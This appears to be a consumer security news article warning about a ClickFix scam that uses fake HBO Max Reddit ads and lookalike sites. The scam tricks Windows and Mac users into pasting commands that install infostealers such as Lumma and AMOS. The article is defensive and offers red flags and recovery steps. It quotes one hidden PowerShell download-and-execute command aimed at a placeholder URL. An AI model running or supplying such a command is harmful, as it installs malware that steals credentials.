ClickFix Scam Uses Fake HBO Max Reddit Ads to Trick Mac and Windows Users Into Hacking Themselves

TL;DR
- Cybercriminals are buying fake HBO Max ads on Reddit that redirect Mac and Windows users to lookalike streaming sites pushing a phony "ClickFix" playback error.
- The scam tricks victims into pasting a hidden PowerShell or Terminal command themselves, installing password-stealers like Lumma Stealer on Windows and Atomic macOS Stealer on Macs.
- No legitimate site will ever ask you to press Win+R, open Terminal, or paste a command to watch video — close the page and never run it.
How Reddit Became the New Trap for Streamers
Reddit users hunting for free HBO Max streams, episode discussion threads, and cheap subscription deals are the latest targets in a fast-growing social engineering wave.
Security researchers warn that attackers have been buying sponsored Reddit ads and promoted posts posing as HBO Max offers — “Watch Dune: Part 2 Free in 4K,” “HBO Max $1.99 Lifetime Deal,” and “Fix HBO Playback Error.” Clicking the ad doesn’t take you to Max.com. It takes you to a near-perfect clone hosted on typosquat domains like hbomax-streaming[.]live, max-play[.]online, and watchmax-hd[.]pro.
Once there, visitors see a familiar video player, a loading spinner, and then a pop-up: “Video cannot be played. Click Fix to verify you are human.” That single click starts the ClickFix chain.
Inside the ClickFix Trick: Hack Yourself in Three Clicks
ClickFix is deceptively simple, which is why it is exploding in 2026. Instead of exploiting a software bug, it exploits you.
On Windows, the fake site shows a bogus verification window mimicking Cloudflare or a browser CAPTCHA with step-by-step instructions: Press Windows + R to open the Run dialog, press Ctrl + V to paste, then press Enter. What the victim doesn’t see is that clicking the “Fix” or “Verify” button has already copied a hidden PowerShell command to their clipboard.
A typical command looks harmless but in reality downloads and executes malware in the background: powershell -w hidden -command irm malicious-url | iex
On Mac, the flow is tailored for macOS. Users are told to open Terminal via Spotlight, paste a “fix command,” and enter their password to “install the HD codec.” That command is actually a curl script that downloads Atomic macOS Stealer (AMOS), a notorious Mac infostealer.
In both cases, the video never plays. The malware does.
Why Traditional Antivirus Misses It
This is what makes ClickFix so dangerous for both Mac and Windows users: there is no malicious download, no exploit kit, and no phishing attachment for security tools to catch at first.
Because the victim manually opens PowerShell, Terminal, or the Run dialog and pastes the command, the operating system treats it as a legitimate user action. Endpoint protection sees a trusted system binary doing the work, not a suspicious file. Browser SmartScreen and Gatekeeper are bypassed entirely.
Researchers at Guardio Labs and Proofpoint who have been tracking ClickFix since 2024 say the 2026 HBO Max variant is more polished than ever, with AI-generated Reddit ad copy, geotargeting, and clipboard hijacking that automatically adapts the instructions based on whether you are on Chrome for Windows or Safari for Mac.
What the Hackers Actually Steal
This is not a prank. The payloads linked to the fake HBO Max campaign are full info-stealers.
On Windows, analysts have observed Lumma Stealer and RedLine Stealer being dropped. On Mac, it’s AMOS and Vidar variants. Once executed, they can in seconds harvest saved Chrome and Edge passwords, crypto wallets, session cookies for Gmail, Reddit, and banking, Discord tokens, and system screenshots.
Stolen cookies are especially valuable because they let attackers bypass multi-factor authentication and hijack active logins. Victims often don’t realize they are compromised until they see password reset emails or drained crypto wallets weeks later.
Who Is Most at Risk
Anyone can fall for ClickFix, but three groups are being hit hardest right now:
- Cord-cutters and casual streamers searching Reddit for “HBO Max free stream” or “watch Euphoria online free” are walking straight into the promoted ads.
- Less-technical Mac users who believe Macs “can’t get viruses” and willingly enter their system password when prompted.
- Younger Windows users accustomed to following Discord and YouTube “fix” tutorials that involve running commands, making the Run-dialog steps feel normal.
With Max raising prices again in 2025 and password-sharing crackdowns pushing people toward unofficial streams, the lure of a cheap or free deal is more powerful than ever.
Red Flags: How to Spot a ClickFix Attack Instantly
Security experts say ClickFix is easy to stop once you know the pattern. Watch for these warning signs:
- A streaming site, CAPTCHA, or error message tells you to press Windows + R, open PowerShell, open Terminal, or use the Run box. No real website will ever do this.
- A “Verify” button tells you to copy something or press Ctrl+V into your system. Legitimate verification ends in the browser.
- You are asked to paste a long PowerShell, mshta, curl, or bash command you don’t understand to “fix video,” “install codec,” or “prove you’re human.”
- The URL isn’t max.com. Look closely for extra words, hyphens, .live, .pro, or .online domains.
How to Stay Protected and What to Do If You Already Clicked
If you land on one of these pages, do not follow the instructions. Close the tab, clear the copied text from your clipboard, and report the Reddit ad as malicious. Never paste unknown commands into Run, PowerShell, or Terminal, even if the site shows a checkmark or tutorial video.
Turn on two-factor authentication with an authenticator app for your email, password manager, and crypto accounts, and use a password manager instead of saving passwords in your browser.
If you already ran the command, assume you are compromised. Disconnect from the internet, run a full scan with updated antivirus or Malwarebytes, and from a clean device, change all major passwords and revoke active sessions. Mac users should check for unknown profiles in System Settings > General > Device Management and unknown LaunchAgents. Crypto holders should move funds to a new wallet immediately.
Reddit says it removes malvertising that violates its policies, and Warner Bros. Discovery reminds users that Max subscriptions are only sold via official channels. Until the ads disappear, remember the golden rule: if a website asks you to hack yourself to watch a show, it’s not HBO — it’s a heist.
Get All The Latest Updates Delivered Straight To Your Inbox For Free!